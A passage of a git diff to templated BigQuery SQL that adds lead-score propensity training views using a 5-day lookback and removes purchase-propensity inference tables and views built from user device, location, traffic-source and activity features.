`{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` +) +WHERE + row_order_peruser_perday_persplit = 1 +) +WHERE + -- Keep one row every 5 days, which is the past window size, to avoid overlapping windows. + MOD(row_order_peruser_persplit-1, 5) = 0; + + +-- This is a view preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day. +-- It specifically filters the most recent rows for each user.
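+-- Because the ROW_NUMBER() below is partitioned by will_{{target_event}} as well, each user can contribute up to two rows: the most recent positive and the most recent negative example.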
+CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1_last_window` +(processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_lead_score_propensity_training_5_1_last_window", + description="View Lead Score Propensity Training dataset using 5 days back to predict 1 day ahead.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}} +FROM( +SELECT DISTINCT + processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}, + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_{{target_event}} ORDER BY feature_date DESC) AS user_row_order + --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` +) +WHERE + user_row_order = 1; + + +-- This is a view preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day. +-- This is to be used in case no {{target_event}}s have been registered recently, leaving you without enough positive examples to train the classification model.
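+-- The view unions the last-window examples with up to 100 additional positive examples (the most recent one per user and split), so the positive class is represented even when {{target_event}}s are rare.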
+CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1_rare_{{target_event}}s` +(processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_lead_score_propensity_training_5_1_rare_{{target_event}}s", + description="View Lead Score Propensity Training dataset using 5 days back to predict 1 day ahead.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}} + FROM + (SELECT DISTINCT + * + FROM `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1_last_window` + ) + UNION ALL + ( + SELECT DISTINCT + * EXCEPT(user_row_order, feature_date) + FROM( + SELECT DISTINCT + *, + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` + WHERE will_{{target_event}} = 1 + ) + WHERE + user_row_order = 1 + LIMIT 100 + ) +; \ No newline at end of file diff --git a/sql/procedure/purchase_propensity_inference_preparation.sqlx b/sql/procedure/purchase_propensity_inference_preparation.sqlx index c848da8d..63194a95 100644 --- a/sql/procedure/purchase_propensity_inference_preparation.sqlx +++ b/sql/procedure/purchase_propensity_inference_preparation.sqlx @@ -627,626 +627,6 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_inferenc FROM `{{project_id}}.{{dataset}}.{{insert_table}}` ); -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_15` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id ORDER 
BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) 
AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS 
checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_8_14_day, - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_7` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id 
ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date 
DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_8_14_day - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_inference_15_15` -(processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - 
view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_purchase_propensity_inference_15_15", - description="View Purchase Propensity Inference dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day -FROM ( - SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - 
visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - -- Row number partitioned by user_pseudo_id and ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_15` -) -WHERE - -- Filter only for the most recent user example - user_row_order = 1; - - - -CREATE OR REPLACE VIEW 